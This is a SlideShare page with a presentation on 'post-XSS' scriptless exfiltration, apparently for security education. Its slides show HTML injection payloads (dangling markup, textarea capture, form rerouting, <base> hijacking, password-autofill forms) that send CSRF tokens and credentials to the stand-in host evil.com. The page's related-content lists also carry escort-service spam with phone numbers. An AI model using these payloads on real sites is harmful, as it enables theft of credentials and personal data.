SlideShare una empresa de Scribd logo

Post XSS

Descargar como PPTX, PDF
I
instaqube
Tecnología
1 de 19
* www.Instaqube.com
* * Type of injection attack, in which malicious scripts are injected into otherwise benign and trusted web sites. * Occur when an attacker uses a web application to send malicious code generally in the form of a client side script, to a different end user. * Flaws that allow these attacks to succeed are prevalent in most web application that utilize user input and generate output without adequate validation or encoding of user input. * An attacker can use XSS to send a malicious script to an unsuspecting user. The end user’s browser has no way to determining that the script should not be trusted, and will execute the script. * Thus giving the malicious script access to cookies, and other sensitive information retained by the browser for use by the site. These scripts can also rewrite the HTML content. www.Instaqube.com
* * XSS should be tested in anything that accepts user input and displays it in the webpage, after rendering it. XSS attacks are successful because most programmers do not apply HTML encoding to the user input, trusting the user input as received. * E.g.: If a user enters “<script>alert (document. Cookie)</script>” in a text filed which upon submission may be rendered as a script tag thus producing a popup alert message with the cookies. * There are plenty of other XSS vectors and information about XSS which you can find out at OWASP. www.Instaqube.com
* * What ? * Very Similar to the XSS. * Why POST XSS? * Browser-level efforts to improve the security of web applications focuses on the containment of attacker-originating scripts. * Content Security Policy, removes the ability to inline JavaScript code in a protected HTML document. * Whitelisting of permissible sources for any externally-loaded scripts. * Related approaches, such as the No Script add-on, the built-in XSS filters in Internet Explorer and Chrome, client-side APIs such as toStaticHTML(...), or the HTML sanitizers built into server-side frameworks, also deserve a note. www.Instaqube.com
* * Goals of a successful XSS attack is the extraction of user-specific secrets from the vulnerable application. * Historically, XSS exploits sought to obtain HTTP (session) cookies. * The introduction of httponly cookies greatly limited this possibility. * In an application where theft of HTTP cookies is not practical, exfiltration attempts are usually geared towards the extraction of any of the following: * Personal Data * Tokens used to defend against cross-site request forgery attacks. * Capability-bearing URLs www.Instaqube.com
* *Dangling markup injection *<textarea>-based consumption *Rerouting of existing forms *Use of <base> to hijack relative URLs *Form injection to intercept browser-managed passwords *The limits of exfiltration defenses www.Instaqube.com
* * Injection of non-terminated markup which will consume a significant portion of the subsequent HTML syntax, until the expected terminating sequence is encountered. • Opposite quote. • Scenario : If we are allowed to inject anything in the HTML content above the sensitive data which we need to steal. * Example : * <img src='http://evil.com/log.cgi? ← Injected line with a non-terminated parameter ... <input type="hidden" name="xsrf_token" value="12345"> ... ' ← Normally- occurring apostrophe in page text ... </div> www.Instaqube.com
* *Limitation : Injection point to appear before the sensitive data to be extracted *If governed by pure chance, this condition will be met in 50% of all cases. *Demo : Dangling Markup Injection www.Instaqube.com
* * Previous method had some limitation like matching quote character. * Injection of a text area. * Scenario: If there is combination of single and quote present before the sensitive data which we want to steal. * Can be injected before or after the legitimate form tag. * Example : * <form action='http://evil.com/log.cgi'><textarea> ← Injected line ... <input type="hidden" name="xsrf_token" value=‘12345’> ... (EOF) www.Instaqube.com
* * Limitation : In contrast to the previous method, a degree of user interaction is needed to exfiltrate the data. * Victim has to submit the form by some means. * Forms with auto-submit capabilities are being considered for HTML5. Such a feature may unintentionally assist with the automation of this attack in future browsers. * Demo : <textarea>-based consumption www.Instaqube.com
* * This works because <form> tag cannot be nested. * Scenario : If we can inject any thing on top of a existing form tag. * This allows the attacker to change the action URL to which any existing form will be submitted. * Example : * <form action='http://evil.com/log.cgi'> ← Injected line ... <form action='update_profile.php'> ← Legitimate, pre-existing form ... <input type="text" name="real_name" value="John Q. Public"> ... </form> www.Instaqube.com
* *Interesting when used to target forms automatically populated with user-specific secrets.  *Demo : Rerouting of existing forms www.Instaqube.com
* * Injection of <base> tags. * Able to change the semantics of all subsequently appearing relative URLs. * Scenario: If we are allowed to insert on the top of the form element. * Example : * <base href='http://evil.com/'> ← Injected line ... <form action='update_profile.php'> ← Legitimate, pre-existing form <form action=''http://evil.com/update_profile.php'> ... <input type="text" name="real_name" value="John Q. Public"> ... </form> www.Instaqube.com
* * Browsers have features to remember username and password for websites. * Browsers auto fill the fields after matching the domain, id and name parameters of the fields. * We can inject a form into a domain using previous exfiltration techniques, to steal the user credentials. * Example : * <form action="http://www.evil.com" method="POST"> <input type="text" id="username" name="username"> <input type="password" id="password" name="password"> </form> www.Instaqube.com
* * We can specify GET instead of POST and submit the credentials to a selected same-site destination. * That destination may links to third-party sites (thus leaking the credentials in the Referer header). * Or echo the parameter in the page. www.Instaqube.com
* * All our previous vector redirects to the attacker domain. * If the developer wishes to restrict the set of permissible destinations for markup such as <form>, <a href=...>, or <img> to his own domain. * However, any attempts to prevent exfiltration, even in script-less environments, are unlikely to be successful. * Exfiltration attempts do not have to be geared toward relaying the data to a third-party website. * Moving data from private place to public place all within the scope of a single website is also sufficient. www.Instaqube.com
* * Example : * <form action='/post_review.php'> <input type='hidden' name='review_body' value=" ← Injected lines ... Your current shipping address: ← Existing page text to be exfiltrated 123 Evergreen Terrace Springfield, USA ... <form action="/update_address.php"> ← Existing form (ignored by the parser) ... <input type="hidden" name="xsrf_token" value="12345"> ← Token valid for /update_address.php and /post_review.php ... </form> • Demo : Addendum: The limits of exfiltration defenses www.Instaqube.com
* * http://lcamtuf.coredump.cx/postxss/ www.Instaqube.com
Thank You Q&A www.Instaqube.com

Recomendados

Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009mirahman
 
NullCon 2012 - Ra.2: blackbox DOM-based XSS scanner
NullCon 2012 - Ra.2: blackbox DOM-based XSS scannerNullCon 2012 - Ra.2: blackbox DOM-based XSS scanner
NullCon 2012 - Ra.2: blackbox DOM-based XSS scannerNishant Das Patnaik
 
Secure coding | XSS Attacks on current Web Applications
Secure coding | XSS Attacks on current Web ApplicationsSecure coding | XSS Attacks on current Web Applications
Secure coding | XSS Attacks on current Web Applicationsn|u - The Open Security Community
 
Introduction to Cross Site Scripting ( XSS )
Introduction to Cross Site Scripting ( XSS )Introduction to Cross Site Scripting ( XSS )
Introduction to Cross Site Scripting ( XSS )Irfad Imtiaz
 
Dom XSS - Encounters of the 3rd Kind (Bishan Singh Kochher)
Dom XSS - Encounters of the 3rd Kind (Bishan Singh Kochher)Dom XSS - Encounters of the 3rd Kind (Bishan Singh Kochher)
Dom XSS - Encounters of the 3rd Kind (Bishan Singh Kochher)ClubHack
 
Cross Site Scripting - Mozilla Security Learning Center
Cross Site Scripting - Mozilla Security Learning CenterCross Site Scripting - Mozilla Security Learning Center
Cross Site Scripting - Mozilla Security Learning CenterMichael Coates
 
Complete xss walkthrough
Complete xss walkthroughComplete xss walkthrough
Complete xss walkthroughAhmed Elhady Mohamed
 
Cross Site Scripting Defense Presentation
Cross Site Scripting Defense Presentation Cross Site Scripting Defense Presentation
Cross Site Scripting Defense Presentation Ikhade Maro Igbape
 

Recomendados

Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009mirahman
 
NullCon 2012 - Ra.2: blackbox DOM-based XSS scanner
NullCon 2012 - Ra.2: blackbox DOM-based XSS scannerNullCon 2012 - Ra.2: blackbox DOM-based XSS scanner
NullCon 2012 - Ra.2: blackbox DOM-based XSS scannerNishant Das Patnaik
 
Secure coding | XSS Attacks on current Web Applications
Secure coding | XSS Attacks on current Web ApplicationsSecure coding | XSS Attacks on current Web Applications
Secure coding | XSS Attacks on current Web Applicationsn|u - The Open Security Community
 
Introduction to Cross Site Scripting ( XSS )
Introduction to Cross Site Scripting ( XSS )Introduction to Cross Site Scripting ( XSS )
Introduction to Cross Site Scripting ( XSS )Irfad Imtiaz
 
Dom XSS - Encounters of the 3rd Kind (Bishan Singh Kochher)
Dom XSS - Encounters of the 3rd Kind (Bishan Singh Kochher)Dom XSS - Encounters of the 3rd Kind (Bishan Singh Kochher)
Dom XSS - Encounters of the 3rd Kind (Bishan Singh Kochher)ClubHack
 
Cross Site Scripting - Mozilla Security Learning Center
Cross Site Scripting - Mozilla Security Learning CenterCross Site Scripting - Mozilla Security Learning Center
Cross Site Scripting - Mozilla Security Learning CenterMichael Coates
 
Complete xss walkthrough
Complete xss walkthroughComplete xss walkthrough
Complete xss walkthroughAhmed Elhady Mohamed
 
Cross Site Scripting Defense Presentation
Cross Site Scripting Defense Presentation Cross Site Scripting Defense Presentation
Cross Site Scripting Defense Presentation Ikhade Maro Igbape
 
Postcards from the post xss world- content exfiltration null
Postcards from the post xss world- content exfiltration nullPostcards from the post xss world- content exfiltration null
Postcards from the post xss world- content exfiltration nullPiyush Pattanayak
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applicationsDevnology
 
04. xss and encoding
04. xss and encoding04. xss and encoding
04. xss and encodingEoin Keary
 
Evolution Of Web Security
Evolution Of Web SecurityEvolution Of Web Security
Evolution Of Web SecurityChris Shiflett
 
New web attacks-nethemba
New web attacks-nethembaNew web attacks-nethemba
New web attacks-nethembaOWASP (Open Web Application Security Project)
 
Web application attacks
Web application attacksWeb application attacks
Web application attackshruth
 
Advanced xss
Advanced xssAdvanced xss
Advanced xssGajendra Saini
 
Web Security
Web SecurityWeb Security
Web SecuritySupankar Banik
 
The Cross Site Scripting Guide
The Cross Site Scripting GuideThe Cross Site Scripting Guide
The Cross Site Scripting GuideDaisuke_Dan
 
Top Ten Web Hacking Techniques – 2008
Top Ten Web Hacking Techniques – 2008Top Ten Web Hacking Techniques – 2008
Top Ten Web Hacking Techniques – 2008Jeremiah Grossman
 
XSS
XSSXSS
XSSHrishikesh Mishra
 
xss-100908063522-phpapp02.pdf
xss-100908063522-phpapp02.pdfxss-100908063522-phpapp02.pdf
xss-100908063522-phpapp02.pdfyashvirsingh48
 
Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)Jeremiah Grossman
 
Application Security
Application SecurityApplication Security
Application Securitynirola
 
Secure Coding
Secure Coding Secure Coding
Secure Coding Shubham Sharma
 
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011Samvel Gevorgyan
 
WebAppSec Updates from W3C
WebAppSec Updates from W3CWebAppSec Updates from W3C
WebAppSec Updates from W3CNatasha Rooney
 
Cross site scripting
Cross site scriptingCross site scripting
Cross site scriptingkinish kumar
 
CSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open RedirectCSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open RedirectBlueinfy Solutions
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesBrad Hill
 
Maximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptxMaximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptxOnBoard
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsMemoori
 

Más contenido relacionado

Similar a Post XSS

Postcards from the post xss world- content exfiltration null
Postcards from the post xss world- content exfiltration nullPostcards from the post xss world- content exfiltration null
Postcards from the post xss world- content exfiltration nullPiyush Pattanayak
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applicationsDevnology
 
04. xss and encoding
04. xss and encoding04. xss and encoding
04. xss and encodingEoin Keary
 
Evolution Of Web Security
Evolution Of Web SecurityEvolution Of Web Security
Evolution Of Web SecurityChris Shiflett
 
Web application attacks
Web application attacksWeb application attacks
Web application attackshruth
 
The Cross Site Scripting Guide
The Cross Site Scripting GuideThe Cross Site Scripting Guide
The Cross Site Scripting GuideDaisuke_Dan
 
Top Ten Web Hacking Techniques – 2008
Top Ten Web Hacking Techniques – 2008Top Ten Web Hacking Techniques – 2008
Top Ten Web Hacking Techniques – 2008Jeremiah Grossman
 
xss-100908063522-phpapp02.pdf
xss-100908063522-phpapp02.pdfxss-100908063522-phpapp02.pdf
xss-100908063522-phpapp02.pdfyashvirsingh48
 
Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)Jeremiah Grossman
 
Application Security
Application SecurityApplication Security
Application Securitynirola
 
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011Samvel Gevorgyan
 
WebAppSec Updates from W3C
WebAppSec Updates from W3CWebAppSec Updates from W3C
WebAppSec Updates from W3CNatasha Rooney
 
Cross site scripting
Cross site scriptingCross site scripting
Cross site scriptingkinish kumar
 
CSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open RedirectCSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open RedirectBlueinfy Solutions
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesBrad Hill
 

Similar a Post XSS (20)

Postcards from the post xss world- content exfiltration null
Postcards from the post xss world- content exfiltration nullPostcards from the post xss world- content exfiltration null
Postcards from the post xss world- content exfiltration null
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applications
 
04. xss and encoding
04. xss and encoding04. xss and encoding
04. xss and encoding
 
Evolution Of Web Security
Evolution Of Web SecurityEvolution Of Web Security
Evolution Of Web Security
 
New web attacks-nethemba
New web attacks-nethembaNew web attacks-nethemba
New web attacks-nethemba
 
Web application attacks
Web application attacksWeb application attacks
Web application attacks
 
Advanced xss
Advanced xssAdvanced xss
Advanced xss
 
Web Security
Web SecurityWeb Security
Web Security
 
The Cross Site Scripting Guide
The Cross Site Scripting GuideThe Cross Site Scripting Guide
The Cross Site Scripting Guide
 
Top Ten Web Hacking Techniques – 2008
Top Ten Web Hacking Techniques – 2008Top Ten Web Hacking Techniques – 2008
Top Ten Web Hacking Techniques – 2008
 
XSS
XSSXSS
XSS
 
xss-100908063522-phpapp02.pdf
xss-100908063522-phpapp02.pdfxss-100908063522-phpapp02.pdf
xss-100908063522-phpapp02.pdf
 
Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)
 
Application Security
Application SecurityApplication Security
Application Security
 
Secure Coding
Secure Coding Secure Coding
Secure Coding
 
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011
 
WebAppSec Updates from W3C
WebAppSec Updates from W3CWebAppSec Updates from W3C
WebAppSec Updates from W3C
 
Cross site scripting
Cross site scriptingCross site scripting
Cross site scripting
 
CSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open RedirectCSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open Redirect
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realities
 

Último

Maximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptxMaximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptxOnBoard
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsMemoori
 
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024BookNet Canada
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 3652toLead Limited
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationRadu Cotescu
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationMichael W. Hawkins
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptxHampshireHUG
 
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphSIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphNeo4j
 
Pigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions
 
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersEnhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersThousandEyes
 
How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?XfilesPro
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Alan Dix
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking MenDelhi Call girls
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdfhans926745
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure servicePooja Nehwal
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationSafe Software
 
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024BookNet Canada
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationSafe Software
 
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxKatpro Technologies
 

Último (20)

Maximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptxMaximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptx
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial Buildings
 
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphSIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
 
Pigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping Elbows
 
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersEnhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
 
How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
 
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
 

Post XSS

  • 2. * * Type of injection attack, in which malicious scripts are injected into otherwise benign and trusted web sites. * Occur when an attacker uses a web application to send malicious code generally in the form of a client side script, to a different end user. * Flaws that allow these attacks to succeed are prevalent in most web application that utilize user input and generate output without adequate validation or encoding of user input. * An attacker can use XSS to send a malicious script to an unsuspecting user. The end user’s browser has no way to determining that the script should not be trusted, and will execute the script. * Thus giving the malicious script access to cookies, and other sensitive information retained by the browser for use by the site. These scripts can also rewrite the HTML content. www.Instaqube.com
  • 3. * * XSS should be tested in anything that accepts user input and displays it in the webpage, after rendering it. XSS attacks are successful because most programmers do not apply HTML encoding to the user input, trusting the user input as received. * E.g.: If a user enters “<script>alert (document. Cookie)</script>” in a text filed which upon submission may be rendered as a script tag thus producing a popup alert message with the cookies. * There are plenty of other XSS vectors and information about XSS which you can find out at OWASP. www.Instaqube.com
  • 4. * * What ? * Very Similar to the XSS. * Why POST XSS? * Browser-level efforts to improve the security of web applications focuses on the containment of attacker-originating scripts. * Content Security Policy, removes the ability to inline JavaScript code in a protected HTML document. * Whitelisting of permissible sources for any externally-loaded scripts. * Related approaches, such as the No Script add-on, the built-in XSS filters in Internet Explorer and Chrome, client-side APIs such as toStaticHTML(...), or the HTML sanitizers built into server-side frameworks, also deserve a note. www.Instaqube.com
  • 5. * * Goals of a successful XSS attack is the extraction of user-specific secrets from the vulnerable application. * Historically, XSS exploits sought to obtain HTTP (session) cookies. * The introduction of httponly cookies greatly limited this possibility. * In an application where theft of HTTP cookies is not practical, exfiltration attempts are usually geared towards the extraction of any of the following: * Personal Data * Tokens used to defend against cross-site request forgery attacks. * Capability-bearing URLs www.Instaqube.com
  • 6. * *Dangling markup injection *<textarea>-based consumption *Rerouting of existing forms *Use of <base> to hijack relative URLs *Form injection to intercept browser-managed passwords *The limits of exfiltration defenses www.Instaqube.com
  • 7. * * Injection of non-terminated markup which will consume a significant portion of the subsequent HTML syntax, until the expected terminating sequence is encountered. • Opposite quote. • Scenario : If we are allowed to inject anything in the HTML content above the sensitive data which we need to steal. * Example : * <img src='http://evil.com/log.cgi? ← Injected line with a non-terminated parameter ... <input type="hidden" name="xsrf_token" value="12345"> ... ' ← Normally- occurring apostrophe in page text ... </div> www.Instaqube.com
  • 8. * *Limitation : Injection point to appear before the sensitive data to be extracted *If governed by pure chance, this condition will be met in 50% of all cases. *Demo : Dangling Markup Injection www.Instaqube.com
  • 9. * * Previous method had some limitation like matching quote character. * Injection of a text area. * Scenario: If there is combination of single and quote present before the sensitive data which we want to steal. * Can be injected before or after the legitimate form tag. * Example : * <form action='http://evil.com/log.cgi'><textarea> ← Injected line ... <input type="hidden" name="xsrf_token" value=‘12345’> ... (EOF) www.Instaqube.com
  • 10. * * Limitation : In contrast to the previous method, a degree of user interaction is needed to exfiltrate the data. * Victim has to submit the form by some means. * Forms with auto-submit capabilities are being considered for HTML5. Such a feature may unintentionally assist with the automation of this attack in future browsers. * Demo : <textarea>-based consumption www.Instaqube.com
  • 11. * * This works because <form> tag cannot be nested. * Scenario : If we can inject any thing on top of a existing form tag. * This allows the attacker to change the action URL to which any existing form will be submitted. * Example : * <form action='http://evil.com/log.cgi'> ← Injected line ... <form action='update_profile.php'> ← Legitimate, pre-existing form ... <input type="text" name="real_name" value="John Q. Public"> ... </form> www.Instaqube.com
  • 12. * *Interesting when used to target forms automatically populated with user-specific secrets.  *Demo : Rerouting of existing forms www.Instaqube.com
  • 13. * * Injection of <base> tags. * Able to change the semantics of all subsequently appearing relative URLs. * Scenario: If we are allowed to insert on the top of the form element. * Example : * <base href='http://evil.com/'> ← Injected line ... <form action='update_profile.php'> ← Legitimate, pre-existing form <form action=''http://evil.com/update_profile.php'> ... <input type="text" name="real_name" value="John Q. Public"> ... </form> www.Instaqube.com
  • 14. * * Browsers have features to remember username and password for websites. * Browsers auto fill the fields after matching the domain, id and name parameters of the fields. * We can inject a form into a domain using previous exfiltration techniques, to steal the user credentials. * Example : * <form action="http://www.evil.com" method="POST"> <input type="text" id="username" name="username"> <input type="password" id="password" name="password"> </form> www.Instaqube.com
  • 15. * * We can specify GET instead of POST and submit the credentials to a selected same-site destination. * That destination may links to third-party sites (thus leaking the credentials in the Referer header). * Or echo the parameter in the page. www.Instaqube.com
  • 16. * * All our previous vector redirects to the attacker domain. * If the developer wishes to restrict the set of permissible destinations for markup such as <form>, <a href=...>, or <img> to his own domain. * However, any attempts to prevent exfiltration, even in script-less environments, are unlikely to be successful. * Exfiltration attempts do not have to be geared toward relaying the data to a third-party website. * Moving data from private place to public place all within the scope of a single website is also sufficient. www.Instaqube.com
  • 17. * * Example : * <form action='/post_review.php'> <input type='hidden' name='review_body' value=" ← Injected lines ... Your current shipping address: ← Existing page text to be exfiltrated 123 Evergreen Terrace Springfield, USA ... <form action="/update_address.php"> ← Existing form (ignored by the parser) ... <input type="hidden" name="xsrf_token" value="12345"> ← Token valid for /update_address.php and /post_review.php ... </form> • Demo : Addendum: The limits of exfiltration defenses www.Instaqube.com
  • 18. * * http://lcamtuf.coredump.cx/postxss/ www.Instaqube.com
  • 19. Thank You Q&A www.Instaqube.com